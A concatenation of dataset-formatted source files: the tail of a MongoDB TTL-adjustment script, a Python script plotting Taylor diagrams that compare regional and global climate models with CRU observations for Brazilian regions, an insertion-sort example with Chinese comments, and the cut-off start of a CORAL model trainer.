gevent.sleep(0.1)\n\n\ndef adjust_ttl_batch_worker(source_collection, seconds, ids, stats):\n\n\n stats.batch += len(ids)\n cursor = source_collection.find({'_id': {'$in': ids}})\n cursor.batch_size(len(ids))\n for doc in cursor:\n time = doc['e']\n id = doc['_id']\n newtime = time+datetime.timedelta(seconds=seconds)\n claim = doc['c']\n claim['e'] += seconds\n doc['e'] = newtime\n source_collection.update({'_id': id}, {\"$set\": {'e': newtime, 'c': claim}}, upsert=False)\n stats.inserted += 1\n\n\ndef update_ttls(source, state_path, seconds):\n\n gevent.monkey.patch_socket()\n\n source_client = utils.mongo_connect(source['host'], source['port'],\n ensure_direct=True,\n max_pool_size=30,\n read_preference=ReadPreference.SECONDARY,\n document_class=FasterOrderedDict)\n\n source_collection = source_client[source['db']][source['collection']]\n if source_client.is_mongos:\n raise Exception(\"for performance reasons, sources must be mongod instances; %s:%d is not\",\n source['host'], source['port'])\n\n if seconds < 0:\n log.info(\"Skipping update, TTL less than 0\")\n return\n\n stats = Stats()\n stats.total_docs = int(source_collection.count())\n\n ids = []\n cursor = source_collection.find(fields=[\"_id\"], snapshot=True, timeout=False)\n cursor.batch_size(5000)\n insert_pool = Pool(40)\n stats_greenlet = gevent.spawn(_ttl_stats_worker, stats)\n\n for doc in cursor:\n _id = doc[\"_id\"]\n\n ids.append(_id)\n if len(ids) % 250 == 0:\n outgoing_ids = ids\n ids = []\n insert_pool.spawn(adjust_ttl_batch_worker,\n source_collection=source_collection,\n seconds=seconds,\n ids=outgoing_ids,\n stats=stats)\n\n gevent.sleep()\n\n if len(ids) > 0:\n adjust_ttl_batch_worker(source_collection=source_collection,\n seconds=seconds,\n ids=ids,\n stats=stats)\n\n\n insert_pool.join()\n stats.log()\n stats_greenlet.kill()\n log.info(\"Finished TTL adjust\")\n\n\n\n\n\n\ndef update_ttls_parent(sources, state_db, args):\n\n process_names = {repr(source): \"%s:%d\" % (source['host'], source['port'])\n for source in sources}\n\n processes = []\n for source in sources:\n name = process_names[repr(source)]\n process = multiprocessing.Process(target=update_ttls,\n name=name,\n kwargs=dict(source=source,\n state_path=state_db._path,\n seconds=args.seconds))\n\n process.start()\n processes.append(process)\n\n utils.wait_for_processes(processes)\n\n\nif __name__ == '__main__':\n # NOTE: we are not gevent monkey-patched here; only child processes are monkey-patched,\n # so all ops below are synchronous\n\n # parse command-line options\n import argparse\n\n parser = argparse.ArgumentParser(description='Adjusts TTL values for messages in the database.')\n parser.add_argument(\n '--source', type=str, required=True, metavar='URL',\n help='source to read from; can be a file containing sources or a url like: host[:port]/db/collection; '\n 'e.g. localhost:27017/prod_maestro.emails')\n parser.add_argument(\n '--seconds', type=int, required=True, metavar=\"Minutes\",\n help='Adjust the TTL of the messages database by N minutes'\n )\n args = parser.parse_args()\n\n # parse source\n if os.path.exists(args.source):\n sources = utils.parse_source_file(args.source)\n else:\n sources = [utils.parse_mongo_url(args.source)]\n\n # initialize sqlite database that holds our state (this may seem like overkill,\n # but it's actually needed to ensure proper synchronization of subprocesses)\n args.state_db = '%s.%s.db' % (sources[0]['db'], sources[0]['collection'])\n\n\n\n state_db_path = os.path.join(os.path.dirname(os.path.realpath(__file__)),\n args.state_db)\n\n log.info('using state db %s' % state_db_path)\n state_db_exists = os.path.exists(state_db_path)\n state_db = CopyStateDB(state_db_path)\n if not state_db_exists:\n state_db.drop_and_create()\n\n # do the real work\n update_ttls_parent(sources, state_db, args)\n log.info(\"SUCCESS!!\")\n\n\n\n\n\n\n","sub_path":"adjust_ttl.py","file_name":"adjust_ttl.py","file_ext":"py","file_size_in_byte":6074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"302141154","text":"# -*- coding: utf-8 -*-\n\n__author__ = \"Leidinice Silva\"\n__email__ = \"leidinicesilva@gmail.com\"\n__date__ = \"01/08/2019\"\n__description__ = \"This script plot taylor diagram from regcm47 and hadgem models and obs database\"\n\nimport os\nimport netCDF4\nimport numpy as np\nimport numpy.ma as ma\nimport scipy.stats as st\nimport matplotlib.pyplot as plt\nimport mpl_toolkits.axisartist.floating_axes as FA\nimport mpl_toolkits.axisartist.grid_finder as GF\n\nfrom matplotlib.projections import PolarAxes\n\n\nclass TaylorDiagram(object):\n \"\"\"\n Taylor diagram.\n Plot model standard deviation and correlation to reference (data)\n sample in a single-quadrant polar plot, with r=stddev and\n theta=arccos(correlation).\n \"\"\"\n\n def __init__(self, refstd, fig=None, rect=336, label='_', marker='', color='', srange=(0., 3.), extend=False):\n \"\"\"\n Set up Taylor diagram axes, i.e. single quadrant polar\n plot, using `mpl_toolkits.axisartist.floating_axes`.\n Parameters:\n * refstd: reference standard deviation to be compared to\n * fig: input Figure or None\n * rect: subplot definition\n * label: reference label\n * srange: stddev axis extension, in units of *refstd*\n * extend: extend diagram to negative correlations\n \"\"\"\n\n self.refstd = refstd \n tr = PolarAxes.PolarTransform()\n\n # Correlation labels\n rlocs = np.array([0, 0.2, 0.4, 0.6, 0.8, 0.9, 0.98, 1])\n \n if extend:\n # Diagram extended to negative correlations\n self.tmax = np.pi\n rlocs = np.concatenate((-rlocs[:0:-1], rlocs))\n else:\n # Diagram limited to positive correlations\n self.tmax = np.pi/2\n \n tlocs = np.arccos(rlocs) # Conversion to polar angles\n gl1 = GF.FixedLocator(tlocs) # Positions\n tf1 = GF.DictFormatter(dict(zip(tlocs, map(str, rlocs))))\n\n # Standard deviation axis extent (in units of reference stddev)\n self.smin = srange[0] * self.refstd\n self.smax = srange[1] * self.refstd\n \n ghelper = FA.GridHelperCurveLinear(tr,\n extremes=(0,self.tmax, # 1st quadrant\n self.smin,self.smax),\n grid_locator1=gl1,\n tick_formatter1=tf1,\n )\n \n if fig is None:\n fig = plt.figure()\n \n ax = FA.FloatingSubplot(fig, rect, grid_helper=ghelper)\n fig.add_subplot(ax)\n\n # Adjust axes\n ax.axis[\"top\"].set_axis_direction(\"bottom\") # \"Angle axis\"\n ax.axis[\"top\"].toggle(ticklabels=True, label=True)\n ax.axis[\"top\"].major_ticklabels.set_axis_direction(\"top\")\n ax.axis[\"top\"].label.set_axis_direction(\"top\")\n ax.axis[\"top\"].label.set_text(u' Correlação')\n\n ax.axis[\"left\"].set_axis_direction(\"bottom\") # \"X axis\"\n ax.axis[\"left\"].toggle(ticklabels=True, label=True)\n ax.axis[\"left\"].major_ticklabels.set_rotation(-90)\n ax.axis[\"left\"].label.set_pad(10) \n ax.axis[\"left\"].label.set_text(u' Desvio padrão')\n \t\t\n ax.axis[\"right\"].set_axis_direction(\"top\") # \"Y-axis\"\n ax.axis[\"right\"].toggle(ticklabels=True, label=True)\n ax.axis[\"right\"].major_ticklabels.set_rotation(90)\n ax.axis[\"right\"].major_ticklabels.set_pad(12)\n ax.axis[\"bottom\"].set_visible(False) # Unused\n\n #~ ax.grid(color='k', axis='x', linestyle='--', linewidth=1)\n \n #~ if self.smin:\n #~ ax.axis[\"bottom\"].toggle(ticklabels=True, label=True)\n #~ else:\n\n self._ax = ax # Graphical axes\n self.ax = ax.get_aux_axes(tr) # Polar coordinates\n\n # Add reference point and stddev contour\n l, = self.ax.plot([0], self.refstd, 'k*', ls='', ms=8, label=label)\n t = np.linspace(0, self.tmax)\n r = np.zeros_like(t) + self.refstd\n self.ax.plot(t, r, 'k--', label='_')\n\n # Collect sample points for latter use (e.g. legend)\n self.samplePoints = [l]\n\n\n def add_sample(self, stddev, corrcoef, *args, **kwargs):\n \"\"\"\n Add sample (*stddev*, *corrcoeff*) to the Taylor\n diagram. *args* and *kwargs* are directly propagated to the\n 'Figure.plot' command.\n \"\"\"\n\t\n l, = self.ax.plot(np.arccos(corrcoef), stddev, *args, **kwargs) # (theta, radius)\n self.samplePoints.append(l)\n \n return l\n \n\n def add_grid(self, *args, **kwargs):\n \"\"\"Add a grid.\"\"\"\n \n self._ax.grid(*args, **kwargs)\n \n\n def add_contours(self, levels=5, **kwargs):\n \"\"\"\n Add constant centered RMS difference contours, defined by *levels*.\n \"\"\"\n \n rs, ts = np.meshgrid(np.linspace(self.smin, self.smax), np.linspace(0, self.tmax))\n rms = np.sqrt(self.refstd**2 + rs**2 - 2*self.refstd*rs*np.cos(ts))\n contours = self.ax.contour(ts, rs, rms, levels, **kwargs)\n \n return contours\n\n\ndef import_obs(var, area, dataset, dt):\n\t\n\tpath = '/home/nice/Documents/dataset/obs/reg_exp1'\n\tarq = '{0}/{1}_{2}_{3}_obs_mon_{4}_lonlat.nc'.format(path, var, area, dataset, dt)\t\n\t\t\t\n\tdata = netCDF4.Dataset(arq)\n\tvar = data.variables[var][:] \n\tlat = data.variables['lat'][:]\n\tlon = data.variables['lon'][:]\n\tvalue = var[:][:,:,:]\n\t\n\tseason_obs = value[2:239:3,:,:]\n\tdjf_obs = np.nanmean(np.nanmean(season_obs[3:80:4], axis=1), axis=1)\n\tmam_obs = np.nanmean(np.nanmean(season_obs[0:80:4], axis=1), axis=1)\n\tjja_obs = np.nanmean(np.nanmean(season_obs[1:80:4], axis=1), axis=1)\n\tson_obs = np.nanmean(np.nanmean(season_obs[2:80:4], axis=1), axis=1)\n\tannual_obs = np.nanmean(np.nanmean(value[0:240:12,:,:], axis=1), axis=1)\n\n\treturn djf_obs, mam_obs, jja_obs, son_obs, annual_obs\n\t\n\ndef import_rcm(var, area, mod, dt):\n\t\n\tpath = '/home/nice/Documents/dataset/rcm/reg_exp1/hist'\n\tarq = '{0}/{1}_{2}_{3}_hist_mon_{4}_lonlat_seamask.nc'.format(path, var, area, mod, dt)\t\n\n\tdata = netCDF4.Dataset(arq)\n\tvar = data.variables[var][:]\n\tlat = data.variables['lat'][:]\n\tlon = data.variables['lon'][:]\n\tvalue = var[:][:,:,:]\n\t\n\tseason_rcm = value[2:239:3,:,:]\n\tdjf_rcm = np.nanmean(np.nanmean(season_rcm[3:80:4], axis=1), axis=1)\n\tmam_rcm = np.nanmean(np.nanmean(season_rcm[0:80:4], axis=1), axis=1)\n\tjja_rcm = np.nanmean(np.nanmean(season_rcm[1:80:4], axis=1), axis=1)\n\tson_rcm = np.nanmean(np.nanmean(season_rcm[2:80:4], axis=1), axis=1)\n\tannual_rcm = np.nanmean(np.nanmean(value[0:240:12,:,:], axis=1), axis=1)\n\n\treturn djf_rcm, mam_rcm, jja_rcm, son_rcm, annual_rcm\n\n\ndef import_gcm(var, area, mod, dt):\n\t\n\tpath = '/home/nice/Documents/dataset/gcm/reg_exp1/hist'\t\n\tarq = '{0}/{1}_{2}_Amon_{3}_hist_r1i1p1_mon_{4}_lonlat_seamask.nc'.format(path, var, area, mod, dt)\t\n\t\t\n\tdata = netCDF4.Dataset(arq)\n\tvar = data.variables[var][:]\n\tlat = data.variables['lat'][:]\n\tlon = data.variables['lon'][:]\n\tvalue = var[:][:,:,:]\n\n\tseason_gcm = value[2:240:3,:,:]\n\tdjf_gcm = np.nanmean(np.nanmean(season_gcm[3:80:4], axis=1), axis=1)\n\tmam_gcm = np.nanmean(np.nanmean(season_gcm[0:80:4], axis=1), axis=1)\n\tjja_gcm = np.nanmean(np.nanmean(season_gcm[1:80:4], axis=1), axis=1)\n\tson_gcm = np.nanmean(np.nanmean(season_gcm[2:80:4], axis=1), axis=1)\n\tannual_gcm = np.nanmean(np.nanmean(value[0:240:12,:,:], axis=1), axis=1)\n\n\treturn djf_gcm, mam_gcm, jja_gcm, son_gcm, annual_gcm\n\n\nif __name__=='__main__':\n\t\n\t# Import models and obs database \n\t# Precipitation\n\tpre_djf_cru_samz, pre_mam_cru_samz, pre_jja_cru_samz, pre_son_cru_samz, pre_annual_cru_samz = import_obs('pre', 'samz', 'cru_ts4.04', '1986-2005')\t \n\tpre_djf_cru_eneb, pre_mam_cru_eneb, pre_jja_cru_eneb, pre_son_cru_eneb, pre_annual_cru_eneb = import_obs('pre', 'eneb', 'cru_ts4.04', '1986-2005')\t \n\tpre_djf_cru_matopiba, pre_mam_cru_matopiba, pre_jja_cru_matopiba, pre_son_cru_matopiba, pre_annual_cru_matopiba = import_obs('pre', 'matopiba', 'cru_ts4.04', '1986-2005')\t \n\n\tpre_djf_rcm_samz, pre_mam_rcm_samz, pre_jja_rcm_samz, pre_son_rcm_samz, pre_annual_rcm_samz = import_rcm('pr', 'samz', 'reg_had', '1986-2005')\t \n\tpre_djf_rcm_eneb, pre_mam_rcm_eneb, pre_jja_rcm_eneb, pre_son_rcm_eneb, pre_annual_rcm_eneb = import_rcm('pr', 'eneb', 'reg_had', '1986-2005')\t \n\tpre_djf_rcm_matopiba, pre_mam_rcm_matopiba, pre_jja_rcm_matopiba, pre_son_rcm_matopiba, pre_annual_rcm_matopiba = import_rcm('pr', 'matopiba', 'reg_had', '1986-2005')\t \n\n\tpre_djf_gcm_samz, pre_mam_gcm_samz, pre_jja_gcm_samz, pre_son_gcm_samz, pre_annual_gcm_samz = import_gcm('pr', 'samz', 'HadGEM2-ES', '1986-2005')\t \n\tpre_djf_gcm_eneb, pre_mam_gcm_eneb, pre_jja_gcm_eneb, pre_son_gcm_eneb, pre_annual_gcm_eneb = import_gcm('pr', 'eneb', 'HadGEM2-ES', '1986-2005')\t \n\tpre_djf_gcm_matopiba, pre_mam_gcm_matopiba, pre_jja_gcm_matopiba, pre_son_gcm_matopiba, pre_annual_gcm_matopiba = import_gcm('pr', 'matopiba', 'HadGEM2-ES', '1986-2005')\t \n\n\t# Temperature\n\ttas_djf_cru_samz, tas_mam_cru_samz, tas_jja_cru_samz, tas_son_cru_samz, tas_annual_cru_samz = import_obs('tmp', 'samz', 'cru_ts4.04', '1986-2005')\t \n\ttas_djf_cru_eneb, tas_mam_cru_eneb, tas_jja_cru_eneb, tas_son_cru_eneb, tas_annual_cru_eneb = import_obs('tmp', 'eneb', 'cru_ts4.04', '1986-2005')\t \n\ttas_djf_cru_matopiba, tas_mam_cru_matopiba, tas_jja_cru_matopiba, tas_son_cru_matopiba, tas_annual_cru_matopiba = import_obs('tmp', 'matopiba', 'cru_ts4.04', '1986-2005')\t \n\n\ttas_djf_rcm_samz, tas_mam_rcm_samz, tas_jja_rcm_samz, tas_son_rcm_samz, tas_annual_rcm_samz = import_rcm('tas', 'samz', 'reg_had', '1986-2005')\t \n\ttas_djf_rcm_eneb, tas_mam_rcm_eneb, tas_jja_rcm_eneb, tas_son_rcm_eneb, tas_annual_rcm_eneb = import_rcm('tas', 'eneb', 'reg_had', '1986-2005')\t \n\ttas_djf_rcm_matopiba, tas_mam_rcm_matopiba, tas_jja_rcm_matopiba, tas_son_rcm_matopiba, tas_annual_rcm_matopiba = import_rcm('tas', 'matopiba', 'reg_had', '1986-2005')\t \n\n\ttas_djf_gcm_samz, tas_mam_gcm_samz, tas_jja_gcm_samz, tas_son_gcm_samz, tas_annual_gcm_samz = import_gcm('tas', 'samz', 'HadGEM2-ES', '1986-2005')\t \n\ttas_djf_gcm_eneb, tas_mam_gcm_eneb, tas_jja_gcm_eneb, tas_son_gcm_eneb, tas_annual_gcm_eneb = import_gcm('tas', 'eneb', 'HadGEM2-ES', '1986-2005')\t \n\ttas_djf_gcm_matopiba, tas_mam_gcm_matopiba, tas_jja_gcm_matopiba, tas_son_gcm_matopiba, tas_annual_gcm_matopiba = import_gcm('tas', 'matopiba', 'HadGEM2-ES', '1986-2005')\t \n\t\t\n\t# Reference database standard desviation\n\tstdrefs = dict(SAMZ1=1,\n\t\t\t\t SAMZ2=1,\n\t\t\t\t ENEB1=1,\n\t\t\t\t ENEB2=1,\n\t\t\t\t MATOPIBA1=1,\n\t\t\t\t MATOPIBA2=1) \n\n\ttext1 = dict(SAMZ1='A) SAMZ',\n\t\t\t\t SAMZ2='D) SAMZ',\n\t\t\t\t ENEB1='B) ENEB',\n\t\t\t\t ENEB2='E) ENEB',\n\t\t\t\t MATOPIBA1='C) MATOPIBA',\n\t\t\t\t MATOPIBA2='F) MATOPIBA')\n\t\t\t\t \n\t# Compute stddev and correlation coefficient of models\n\tsamples = dict(SAMZ1=[[pre_djf_cru_samz.std(ddof=1), np.corrcoef(pre_djf_cru_samz, pre_djf_rcm_samz)[0,1], 'DJF', 'o', 'g'],\n [pre_mam_cru_samz.std(ddof=1), np.corrcoef(pre_mam_cru_samz, pre_mam_rcm_samz)[0,1], 'MAM', 'o', 'b'],\n [pre_jja_cru_samz.std(ddof=1), np.corrcoef(pre_jja_cru_samz, pre_jja_rcm_samz)[0,1], 'JJA', 'o', 'y'],\n [pre_son_cru_samz.std(ddof=1), np.corrcoef(pre_son_cru_samz, pre_son_rcm_samz)[0,1], 'SON', 'o', 'c'],\n [pre_annual_cru_samz.std(ddof=1), np.corrcoef(pre_annual_cru_samz, pre_annual_rcm_samz)[0,1], 'ANN', 'o', 'r'],\n [pre_djf_cru_samz.std(ddof=1), np.corrcoef(pre_djf_cru_samz, pre_djf_gcm_samz)[0,1], 'DJF', 's', 'g'],\n [pre_mam_cru_samz.std(ddof=1), np.corrcoef(pre_mam_cru_samz, pre_mam_gcm_samz)[0,1], 'MAM', 's', 'b'],\n [pre_jja_cru_samz.std(ddof=1), np.corrcoef(pre_jja_cru_samz, pre_jja_gcm_samz)[0,1], 'JJA', 's', 'y'],\n [pre_son_cru_samz.std(ddof=1), np.corrcoef(pre_son_cru_samz, pre_son_gcm_samz)[0,1], 'SON', 's', 'c'],\n [pre_annual_cru_samz.std(ddof=1), np.corrcoef(pre_annual_cru_samz, pre_annual_gcm_samz)[0,1], 'ANN', 's', 'r']],\n SAMZ2=[[tas_djf_cru_samz.std(ddof=1), np.corrcoef(tas_djf_cru_samz, np.nanmean(tas_djf_rcm_samz, axis=1))[0,1], 'DJF', 'o', 'g'],\n [tas_mam_cru_samz.std(ddof=1), np.corrcoef(tas_mam_cru_samz, np.nanmean(tas_mam_rcm_samz, axis=1))[0,1], 'MAM', 'o', 'b'],\n [tas_jja_cru_samz.std(ddof=1), np.corrcoef(tas_jja_cru_samz, np.nanmean(tas_jja_rcm_samz, axis=1))[0,1], 'JJA', 'o', 'y'],\n [tas_son_cru_samz.std(ddof=1), np.corrcoef(tas_son_cru_samz, np.nanmean(tas_son_rcm_samz, axis=1))[0,1], 'SON', 'o', 'c'],\n [tas_annual_cru_samz.std(ddof=1), np.corrcoef(tas_annual_cru_samz, np.nanmean(tas_annual_rcm_samz, axis=1))[0,1], 'ANN', 'o', 'r'],\n [tas_djf_cru_samz.std(ddof=1), np.corrcoef(tas_djf_cru_samz, tas_djf_gcm_samz)[0,1], 'DJF', 's', 'g'],\n [tas_mam_cru_samz.std(ddof=1), np.corrcoef(tas_mam_cru_samz, tas_mam_gcm_samz)[0,1], 'MAM', 's', 'b'],\n [tas_jja_cru_samz.std(ddof=1), np.corrcoef(tas_jja_cru_samz, tas_jja_gcm_samz)[0,1], 'JJA', 's', 'y'],\n [tas_son_cru_samz.std(ddof=1), np.corrcoef(tas_son_cru_samz, tas_son_gcm_samz)[0,1], 'SON', 's', 'c'],\n [tas_annual_cru_samz.std(ddof=1), np.corrcoef(tas_annual_cru_samz, tas_annual_gcm_samz)[0,1], 'ANN', 's', 'r']],\n ENEB1=[[pre_djf_cru_eneb.std(ddof=1), np.corrcoef(pre_djf_cru_eneb, pre_djf_rcm_eneb)[0,1], 'DJF', 'o', 'g'],\n [pre_mam_cru_eneb.std(ddof=1), np.corrcoef(pre_mam_cru_eneb, pre_mam_rcm_eneb)[0,1], 'MAM', 'o', 'b'],\n [pre_jja_cru_eneb.std(ddof=1), np.corrcoef(pre_jja_cru_eneb, pre_jja_rcm_eneb)[0,1], 'JJA', 'o', 'y'],\n [pre_son_cru_eneb.std(ddof=1), np.corrcoef(pre_son_cru_eneb, pre_son_rcm_eneb)[0,1], 'SON', 'o', 'c'],\n [pre_annual_cru_eneb.std(ddof=1), np.corrcoef(pre_annual_cru_eneb, pre_annual_rcm_eneb)[0,1], 'ANN', 'o', 'r'],\n [pre_djf_cru_eneb.std(ddof=1), np.corrcoef(pre_djf_cru_eneb, pre_djf_gcm_eneb)[0,1], 'DJF', 's', 'g'],\n [pre_mam_cru_eneb.std(ddof=1), np.corrcoef(pre_mam_cru_eneb, pre_mam_gcm_eneb)[0,1], 'MAM', 's', 'b'],\n [pre_jja_cru_eneb.std(ddof=1), np.corrcoef(pre_jja_cru_eneb, pre_jja_gcm_eneb)[0,1], 'JJA', 's', 'y'],\n [pre_son_cru_eneb.std(ddof=1), np.corrcoef(pre_son_cru_eneb, pre_son_gcm_eneb)[0,1], 'SON', 's', 'c'],\n [pre_annual_cru_eneb.std(ddof=1), np.corrcoef(pre_annual_cru_eneb, pre_annual_gcm_eneb)[0,1], 'ANN', 's', 'r']], \n ENEB2=[[tas_djf_cru_eneb.std(ddof=1), np.corrcoef(tas_djf_cru_eneb, np.nanmean(tas_djf_rcm_eneb, axis=1))[0,1], 'DJF', 'o', 'g'],\n [tas_mam_cru_eneb.std(ddof=1), np.corrcoef(tas_mam_cru_eneb, np.nanmean(tas_mam_rcm_eneb, axis=1))[0,1], 'MAM', 'o', 'b'],\n [tas_jja_cru_eneb.std(ddof=1), np.corrcoef(tas_jja_cru_eneb, np.nanmean(tas_jja_rcm_eneb, axis=1))[0,1], 'JJA', 'o', 'y'],\n [tas_son_cru_eneb.std(ddof=1), np.corrcoef(tas_son_cru_eneb, np.nanmean(tas_son_rcm_eneb, axis=1))[0,1], 'SON', 'o', 'c'],\n [tas_annual_cru_eneb.std(ddof=1), np.corrcoef(tas_annual_cru_eneb, np.nanmean(tas_annual_rcm_eneb, axis=1))[0,1], 'ANN', 'o', 'r'],\n [tas_djf_cru_eneb.std(ddof=1), np.corrcoef(tas_djf_cru_eneb, tas_djf_gcm_eneb)[0,1], 'DJF', 's', 'g'],\n [tas_mam_cru_eneb.std(ddof=1), np.corrcoef(tas_mam_cru_eneb, tas_mam_gcm_eneb)[0,1], 'MAM', 's', 'b'],\n [tas_jja_cru_eneb.std(ddof=1), np.corrcoef(tas_jja_cru_eneb, tas_jja_gcm_eneb)[0,1], 'JJA', 's', 'y'],\n [tas_son_cru_eneb.std(ddof=1), np.corrcoef(tas_son_cru_eneb, tas_son_gcm_eneb)[0,1], 'SON', 's', 'c'],\n [tas_annual_cru_eneb.std(ddof=1), np.corrcoef(tas_annual_cru_eneb, tas_annual_gcm_eneb)[0,1], 'ANN', 's', 'r']],\n MATOPIBA1=[[pre_djf_cru_matopiba.std(ddof=1), np.corrcoef(pre_djf_cru_matopiba, pre_djf_rcm_matopiba)[0,1], 'DJF', 'o', 'g'],\n [pre_mam_cru_matopiba.std(ddof=1), np.corrcoef(pre_mam_cru_matopiba, pre_mam_rcm_matopiba)[0,1], 'MAM', 'o', 'b'],\n [pre_jja_cru_matopiba.std(ddof=1), np.corrcoef(pre_jja_cru_matopiba, pre_jja_rcm_matopiba)[0,1], 'JJA', 'o', 'y'],\n [pre_son_cru_matopiba.std(ddof=1), np.corrcoef(pre_son_cru_matopiba, pre_son_rcm_matopiba)[0,1], 'SON', 'o', 'c'],\n [pre_annual_cru_matopiba.std(ddof=1), np.corrcoef(pre_annual_cru_matopiba, pre_annual_rcm_matopiba)[0,1], 'ANN', 'o', 'r'],\n [pre_djf_cru_matopiba.std(ddof=1), np.corrcoef(pre_djf_cru_matopiba, pre_djf_gcm_matopiba)[0,1], 'DJF', 's', 'g'],\n [pre_mam_cru_matopiba.std(ddof=1), np.corrcoef(pre_mam_cru_matopiba, pre_mam_gcm_matopiba)[0,1], 'MAM', 's', 'b'],\n [pre_jja_cru_matopiba.std(ddof=1), np.corrcoef(pre_jja_cru_matopiba, pre_jja_gcm_matopiba)[0,1], 'JJA', 's', 'y'],\n [pre_son_cru_matopiba.std(ddof=1), np.corrcoef(pre_son_cru_matopiba, pre_son_gcm_matopiba)[0,1], 'SON', 's', 'c'],\n [pre_annual_cru_matopiba.std(ddof=1), np.corrcoef(pre_annual_cru_matopiba, pre_annual_gcm_matopiba)[0,1], 'ANN', 's', 'r']], \n MATOPIBA2=[[tas_djf_cru_matopiba.std(ddof=1), np.corrcoef(tas_djf_cru_matopiba, np.nanmean(tas_djf_rcm_matopiba, axis=1))[0,1], 'DJF', 'o', 'g'],\n [tas_mam_cru_matopiba.std(ddof=1), np.corrcoef(tas_mam_cru_matopiba, np.nanmean(tas_mam_rcm_matopiba, axis=1))[0,1], 'MAM', 'o', 'b'],\n [tas_jja_cru_matopiba.std(ddof=1), np.corrcoef(tas_jja_cru_matopiba, np.nanmean(tas_jja_rcm_matopiba, axis=1))[0,1], 'JJA', 'o', 'y'],\n [tas_son_cru_matopiba.std(ddof=1), np.corrcoef(tas_son_cru_matopiba, np.nanmean(tas_son_rcm_matopiba, axis=1))[0,1], 'SON', 'o', 'c'],\n [tas_annual_cru_matopiba.std(ddof=1), np.corrcoef(tas_annual_cru_matopiba, np.nanmean(tas_annual_rcm_matopiba, axis=1))[0,1], 'ANN', 'o', 'r'],\n [tas_djf_cru_matopiba.std(ddof=1), np.corrcoef(tas_djf_cru_matopiba, tas_djf_gcm_matopiba)[0,1], 'DJF', 's', 'g'],\n [tas_mam_cru_matopiba.std(ddof=1), np.corrcoef(tas_mam_cru_matopiba, tas_mam_gcm_matopiba)[0,1], 'MAM', 's', 'b'],\n [tas_jja_cru_matopiba.std(ddof=1), np.corrcoef(tas_jja_cru_matopiba, tas_jja_gcm_matopiba)[0,1], 'JJA', 's', 'y'],\n [tas_son_cru_matopiba.std(ddof=1), np.corrcoef(tas_son_cru_matopiba, tas_son_gcm_matopiba)[0,1], 'SON', 's', 'c'],\n [tas_annual_cru_matopiba.std(ddof=1), np.corrcoef(tas_annual_cru_matopiba, tas_annual_gcm_matopiba)[0,1], 'ANN', 's', 'r']])\n\n\tx95 = [0.01, 8.5] # For Tair, this is for 95th level (r = 0.195)\n\ty95 = [0.0, 3]\n\tx99 = [0.01, 0.9] # For Tair, this is for 99th level (r = 0.254)\n\ty99 = [0.0, 3]\n\n\trects = dict(SAMZ1=321,\n\t\t\t\t SAMZ2=322,\n\t\t\t\t ENEB1=323,\n\t\t\t\t ENEB2=324,\n\t\t\t\t MATOPIBA1=325,\n\t\t\t\t MATOPIBA2=326)\n\n\t# Plot models and obs database taylor diagram\n\tfig = plt.figure(figsize=(6, 7))\n\t\n\tfor var in ['SAMZ1', 'SAMZ2', 'ENEB1', 'ENEB2', 'MATOPIBA1', 'MATOPIBA2']:\n\n\t\tdia = TaylorDiagram(stdrefs[var], fig=fig, rect=rects[var], label=u'Referência', srange=(0., 3.), extend=True)\n\t\tdia.samplePoints[0].set_color('r')\n\t\tdia.ax.plot(x95,y95,color='black')\n\t\tdia.ax.plot(x99,y99,color='black')\n\t\t\t\t\n\t\t# Add samples to Taylor diagram\n\t\tfor i, (stddev,corrcoef,name,mark,cor) in enumerate(samples[var]):\n\t\t\tdia.add_sample(stddev, corrcoef,\n\t\t\t\t\t\t label=name, marker=mark, mfc=cor, color='black', ms=8, ls='')\t\t\t \n\t\t\tplt.text(-3.3, 3.7, text1[var], fontweight='bold')\n\t\t\t\n\n\t\t# Add RMS contours, and label them\n\t\tcontours = dia.add_contours(levels=5, colors='0.5')\n\t\tplt.clabel(contours, inline=1, fontsize=8, fmt='%.1f')\n\n\tplt.text(-9.0, -1.8, u'Precipitação (mm d⁻¹)')\n\tplt.text(-1.5, -1.8, u'Temperatura (°C)')\n\n\t# Add a figure legend\n\tfig.legend(dia.samplePoints, \n\t\t\t [ p.get_label() for p in dia.samplePoints ], \n\t\t\t prop=dict(size=8), ncol=6, numpoints=1, loc='lower center')\n\t\t\n\t# Path out to save figure\n\tpath_out = '/home/nice/Downloads'\n\tname_out = 'pyplt_taylor_diagram_reg_had_obs_1986-2005.png'\n\tif not os.path.exists(path_out):\n\t\tcreate_path(path_out)\n\tplt.savefig(os.path.join(path_out, name_out), dpi=600, bbox_inches='tight')\n\tplt.show()\n\texit()\n","sub_path":"plot_taylor_diagram_regcm47_obs_exp1.py","file_name":"plot_taylor_diagram_regcm47_obs_exp1.py","file_ext":"py","file_size_in_byte":20979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"184209075","text":"\nimport random\n\n\"\"\"\n# 插入排序:\n# 思路就是打扑克时,一边抓牌一边理牌的做法,\n# 从第二个元素开始,查看是否比前面元素小,是的话,将前面大的元素依次往后挪,自己插入该空位\n# 需要一个辅助空间\n# 平均移动和比较次数为 n方/4,比冒泡和选择要再好一丢丢\n\"\"\"\n\n\ndef InsertSort(nums):\n # 从第二个元素开始\n for i in range(1, len(nums)):\n tmp = nums[i]\n j = i - 1\n while j >= 0 and tmp < nums[j]:\n # 大的元素依次往后挪\n nums[j+1] = nums[j]\n # 别完了 往前移动 j 指针\n j -= 1\n nums[j+1] = tmp\n return nums\n\n\n# 测试数据\ndef start():\n nums = [x*10 for x in range(1,11)]\n random.shuffle(nums)\n print(nums)\n\n print(\"===========排序后=================\")\n nums = InsertSort(nums)\n print(nums)\n\nif __name__ == '__main__':\n start()","sub_path":"Sort/InsertSort.py","file_name":"InsertSort.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"606355372","text":"# coding=utf-8\n# created by Ge Zhang, Jan 20, 2020\n#\n# CORAL trainer\n\n\nimport torch\nimport torch.nn as nn\nfrom torch.optim import Adam, SGD\nfrom torch.utils.data import DataLoader\nimport torch.nn.functional as F\nfrom coral.model import BERT, CORAL\n\n\nimport tqdm\nimport pdb\ntorch.manual_seed(0)\n\n\ndef my_loss(reconstructed_pos, origin_pos, origin_neg):\n duplicate = int(origin_neg.shape[0] / reconstructed_pos.shape[0])\n\n hid_size = origin_neg.shape[-1]\n\n pos_sim = torch.bmm(reconstructed_pos.unsqueeze(\n 1), 